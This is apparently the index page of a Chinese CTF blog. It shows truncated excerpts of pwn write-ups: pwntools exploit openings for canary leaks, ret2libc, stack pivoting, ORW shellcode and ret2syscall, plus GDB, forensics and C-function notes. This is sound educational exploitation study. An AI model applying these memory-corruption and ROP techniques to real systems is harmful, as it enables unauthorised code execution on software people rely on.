iscc wp
pwn签开了canary,可以用printf泄露canary后面直接打libc就好了
libc:libc database search
1234567891011121314151617181920212223242526272829303132333435363738394041from pwn import *context(arch = 'i386',os = 'linux',log_level = 'debug')#io = remote('192.168.9.151',55097)#io = process(# ["/home/pwn/桌面/ld.so.2", "./pwn"],# env={"LD_PRELOAD": "/home/pwn/桌面/libc.so.6"},#)#io=process('./pwn')io=remote('101.200.15 ...
蓝桥杯wp
蓝桥杯wp数据分析ezEvtx筛选出告警日志发现文件操作
flag{confidential.docx }
flowzip010Editor打开搜索flag字符串
flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}
密码破解Enigma
输入输出交换即可
漏洞挖掘与分析RuneBreach简单的ORW,输入4次N后会gameover在bss段上分配一个可读写执行的区域可以用来写系统调用,最后会return到该区域
exp
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from pwn import*context(arch = 'amd64',os = 'linux',log_level = 'debug')io=remote('39.107.248.198',33600)#io=process('./pwn' ...
取证
Linux相关搭建该服务器的技术员IP地址是多少(查看登录信息)1last
查看操作系统发行版本号1cat /etc/*-release
扩展:查看Linux发行版名称、版本号和内核版本的方法
bash # lsb_release -aLSB( Linux 标准库(Linux Standard Base))能够打印发行版的具体信息, 包括发行版名称、版本号、代号等。
bash # cat /etc/*-releaserelease 文件通常被视为操作系统的标识。在 /etc 目录下放置了很多记录着发行版各种信息的文件, 每个发行版都各自有一套这样记录着相关信息的文件。
bash # uname -auname(unix name 的意思) 是一个打印系统信息的工具, 包括内核名称、版本号、系统详细信息以及所运行的操作系统等等。
bash # cat /proc/version记录 Linux 内核的版本、用于编译内核的 gcc 的版本、内核编译的时间, 以及内核编译者的用户名。
bash # dmesg | grep “lin ...
baseCTF浮现
BaseCTF2024新生赛pwn题浮现只记录了部分题目
她与你皆失简单的ret2libc但是有个小tips,获取二次输入如果直接跳转到main函数程序无法打通估计是某个寄存器的值不满足,可以选择跳转到start的地址从头开始运行程序保证寄存器的值正常
123456789101112131415161718192021222324252627282930from pwn import*context(arch='amd64',os = 'linux',log_level='debug')io=remote('gz.imxbt.cn',20992)#io=process('./pwn')elf=ELF('./pwn')libc=ELF('./libc.so.6')pop_rdi= 0x401176ret_addr = 0x0040101aread = elf.sym['read']puts_plt = elf.plt[' ...
函数合集
这篇文章用于记录函数的详细信息csetbufsetbuf 函数用于设置文件流的缓冲区。它允许你指定一个用户提供的缓冲区,用于文件的输入输出操作
1void setbuf(FILE *stream, char *buf);
setbuf只有全缓冲或无缓冲
参数
含义
stream
要设置缓冲区的文件流。
buf
用户提供的缓冲区。如果 buf 为 NULL,则禁用缓冲。
文件流
含义
stdio
标准输入流
stdout
标准输出流
stderr
标准错误流
缓冲模式
对应字符
无缓冲_IONBF
0 或 NULL
全缓冲_IOFBF
2
setvbuf1int setvbuf(FILE *stream, char *buf, int mode, size_t size);
参数:
1234567stream:要设置缓冲区的文件流。buf:用户提供的缓冲区。如果为 NULL,则使用系统分配的缓冲区。mode:缓冲类型,可以是以下值:_IOFBF:全缓冲。_IOLBF:行缓冲。_IONBF:无缓冲。size:缓冲区大小。
...
赛题合集
国内比赛XYCTF2025girlfirendcheck发现保护全开,有菜单但是似乎不是堆题
发现有system("echo /flag"); 但是没有/bin/sh
解析各个选择
1:
123456789101112131415161718192021__int64 lll1(){ char buf[56]; // [rsp+0h] [rbp-40h] BYREF unsigned __int64 v2; // [rsp+38h] [rbp-8h] v2 = __readfsqword(0x28u); if ( dword_4094 ) { puts("You have already tried to talk to her, and she left..."); } else { dword_4094 = 1; puts("Girl is very beautiful!"); puts("what do you ...
ctfshow刷题记录
pwn75栈迁移check
1234567桌面$ checksec pwn[*] '/home/pwn/桌面/pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
题目提示”栈空间不够怎么办”,可以用栈迁移
栈迁移原理是利用两次leave ret先将ebp的值修改为输入shell的地址,再利用第二次leave ret将esp的值改为ebp的值,pop ebp将此时栈顶的值弹入ebp中,esp+4执行ret也就是pop eip将当前栈顶内容弹入执行流,使我们压在栈上非返回地址处的地址也可以执行达到控制执行流的效果
观察程序
漏洞函数:ctfshow
1234567891011int ctfshow(){ char s[36]; // [esp+0h] [ebp-28h] BYREF memset(s, 0, 0x20u) ...
polar2025春季赛 wp
前言这次polarD&N上pwn方向上的题都挺好的,进一步学习了canary绕过也发现了自己的很多问题(看得懂知识的不知道怎么实际来打等)
libc一题简单的ret2libc,也是当天唯一出的一题
12345678int jiu(){ char buf[58]; // [esp+Eh] [ebp-3Ah] BYREF puts("like"); read(0, buf, 0x50u); return 0;}//有栈溢出漏洞
程序动态链接,开了nx没开canary有puts函数直接puts泄露libc即可
exp:
12345678910111213141516171819202122232425262728from pwn import*from LibcSearcher import*io=remote('1.95.36.136',2148)#io=process('./pwn')elf=ELF('./pwn1')main=elf.sym['main ...
GDB调试
GDB调试这篇文章用于记录gdb调试的学习
常用指令1234567891011121314gdb pwn #开始调试b 函数名 #在指定函数处打断点b* 地址 #在指定位置处设置断点b* $rebase(要下断点的偏移) #有PIE时这样下断点得先run起来n #c语言级的断点定位(走得快一点)ni #汇编级别的断点定位(走得精细一点)s/si #s与si的区别和n/ni相同,不同点在于s/si会进入函数内部fibi #跳出函数r #运行c #让程序继续运行stack 30 #查看此时栈中的内容x/gx #计算偏移x/1gx $rsp+0x10 #查看rsp+0x10处的值start #开始程序
给exp加gdb调试
12context.terminal = ["tmux","splitw","-h"]#左右分屏gdb.attach(io)#放到想要在exp中停止的位置,程序在运行时候会停止在该处进行调试
此处加了一个小插件tmux可以双栏显示调试,更方便查看。
1234sudo apt ...
ret2syscall
ret2syscall其实在ret2shellcod里我们就已经使用过ret2syscall的类似解法,也就是系统调用但只用了orw,这篇文章来介绍静态链接的elf文件使用gadget构造系统调用execve(“/bin/sh”,NULL,NULL)拿shell
对于i386程序想要系统调用execve(“/bin/sh”,NULL,NULL)需要达成以下条件:
系统调用号,即 eax 应该为 0xb,因为是execve所以是0xb
第一个参数,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。
第二个参数,即 ecx 应该为 0
第三个参数,即 edx 应该为 0
最后int 0x80 系统调用
接下来就用ROPgadget来找对应gadget
123456ROPgadget --binary pwn --only 'pop|ret' | grep 'eax'ROPgadget --binary pwn --only 'pop|ret' ...